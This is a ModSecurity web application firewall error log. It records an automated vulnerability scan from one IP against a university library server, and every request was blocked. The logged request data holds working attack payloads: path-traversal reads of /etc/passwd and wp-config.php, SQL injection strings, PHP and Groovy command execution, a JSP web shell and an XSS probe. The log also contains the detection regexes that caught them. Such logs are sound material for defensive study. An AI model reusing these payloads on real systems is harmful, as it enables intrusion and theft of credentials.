[Tue Aug 29 11:47:31.410638 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjCbG8AAAAB"]
[Tue Aug 29 11:47:32.806359 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9DsAAAAA"]
[Tue Aug 29 11:47:34.661724 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9FIAAAAA"]
[Tue Aug 29 11:47:36.912620 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbJoAAAAB"]
[Tue Aug 29 11:47:37.444420 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjCbKIAAAAB"]
[Tue Aug 29 11:47:39.414115 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAhui@cAAAAr"]
[Tue Aug 29 11:47:40.363971 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhT4CAAAAAD"]
[Tue Aug 29 11:47:40.396407 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhT4CAAAAAD"]
[Tue Aug 29 11:47:41.372374 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GMAAAAA"]
[Tue Aug 29 11:47:41.382787 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GMAAAAA"]
[Tue Aug 29 11:47:41.670762 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAkNPnMAAAAI"]
[Tue Aug 29 11:47:42.534978 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjav4IAAAAV"]
[Tue Aug 29 11:47:43.518948 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14b8Co-f0AAAi2yKQAAAAN"]
[Tue Aug 29 11:47:43.739696 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjFofEAAAAF"]
[Tue Aug 29 11:47:44.514691 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAhl0L0AAAAi"]
[Tue Aug 29 11:47:46.493170 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAjW9HAAAAAA"]
[Tue Aug 29 11:47:47.843199 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAj119UAAAAa"]
[Tue Aug 29 11:47:48.359796 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjFofkAAAAF"]
[Tue Aug 29 11:47:48.444315 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAkcgTEAAAAM"]
[Tue Aug 29 11:47:49.495749 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjtc4cAAAAX"]
[Tue Aug 29 11:47:49.566595 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAjL8WwAAAAR"]
[Tue Aug 29 11:47:50.357518 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkdu3wAAAAO"]
[Tue Aug 29 11:47:50.394844 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAhl0MYAAAAi"]
[Tue Aug 29 11:47:50.395754 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAkaC@wAAAAJ"]
[Tue Aug 29 11:47:50.443704 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkBKo0AAAAb"]
[Tue Aug 29 11:47:51.437034 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "digilibfeb.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkAL9QAAAAU"]
[Tue Aug 29 11:47:51.468638 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjtc5EAAAAX"]
[Tue Aug 29 11:47:52.465375 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAj11@cAAAAa"]
[Tue Aug 29 11:47:52.521600 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjM7HYAAAAT"]
[Tue Aug 29 11:47:53.433133 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjdQQwAAAAZ"]
[Tue Aug 29 11:47:56.487866 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAj11-gAAAAa"]
[Tue Aug 29 11:47:57.436032 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAjCbM8AAAAB"]
[Tue Aug 29 11:47:58.404231 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjy52QAAAAG"]
[Tue Aug 29 11:47:58.411416 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAkaDAAAAAAJ"]
[Tue Aug 29 11:47:59.770672 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAjdQRcAAAAZ"]
[Tue Aug 29 11:48:02.473436 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAjqDGkAAAAH"]
